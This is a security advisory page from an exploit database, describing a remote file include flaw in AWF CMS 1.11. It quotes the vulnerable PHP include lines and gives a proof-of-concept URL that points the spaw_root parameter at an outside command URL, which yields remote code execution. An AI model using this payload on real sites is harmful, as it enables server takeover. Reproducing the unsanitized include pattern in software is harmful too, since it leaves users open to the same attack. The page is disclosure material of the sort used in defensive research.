[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AWF CMS 1.11 (spaw_root) Remote File Include Vulnerability

Author
Federico Fazzi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-509
Category
web applications
Date add
10-06-2006
Platform
unsorted
==========================================================
AWF CMS 1.11 (spaw_root) Remote File Include Vulnerability
==========================================================




-----------------------------------------------------
Advisory id: FSA:011

Author:    Federico Fazzi
Date:      11/06/2006, 22:30
Sinthesis: AWF CMS 1.11, Remote command execution
Type:      high
Patch:     unavailable
-----------------------------------------------------


1) Description:

Error occured in spaw_control.class.php,

include $spaw_root.'config/spaw_control.config.php';
include $spaw_root.'class/toolbars.class.php';
include $spaw_root.'class/lang.class.php';

variable $spaw_root not sanitized.

2) Proof of concept:

http://example/[ac_path]/spaw/spaw_control.class.php?spaw_root=[cmd_url]/
(note: add a cmd url with final slash (/))

3) Solution:

declare $spaw_root.


#  0day.today [2024-11-13]  #